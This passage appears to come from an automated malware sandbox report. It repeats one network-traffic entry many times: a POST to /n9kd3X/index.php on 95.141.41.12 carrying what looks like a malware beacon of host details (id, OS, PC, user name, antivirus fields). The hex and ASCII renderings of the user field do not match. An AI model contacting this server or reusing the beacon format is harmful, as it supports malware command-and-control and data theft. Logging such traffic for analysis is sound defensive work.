                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /n9kd3X/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 95.141.41.12Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 39 26 73 64 3d 39 33 37 36 39 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 37 38 34 31 31 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.89&sd=937693&os=1&bi=1&ar=1&pc=878411&un=user&dm=&av=13&lv=0&og=1
